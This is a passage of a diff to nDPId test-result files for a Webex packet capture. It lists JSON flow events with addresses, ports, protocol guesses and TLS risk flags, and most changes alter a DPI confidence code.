{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636151,"flow_last_seen":1444570638237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640284,"flow_last_seen":1444570645701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Webex","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00665{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640330,"flow_last_seen":1444570670371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640338,"flow_last_seen":1444570670373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 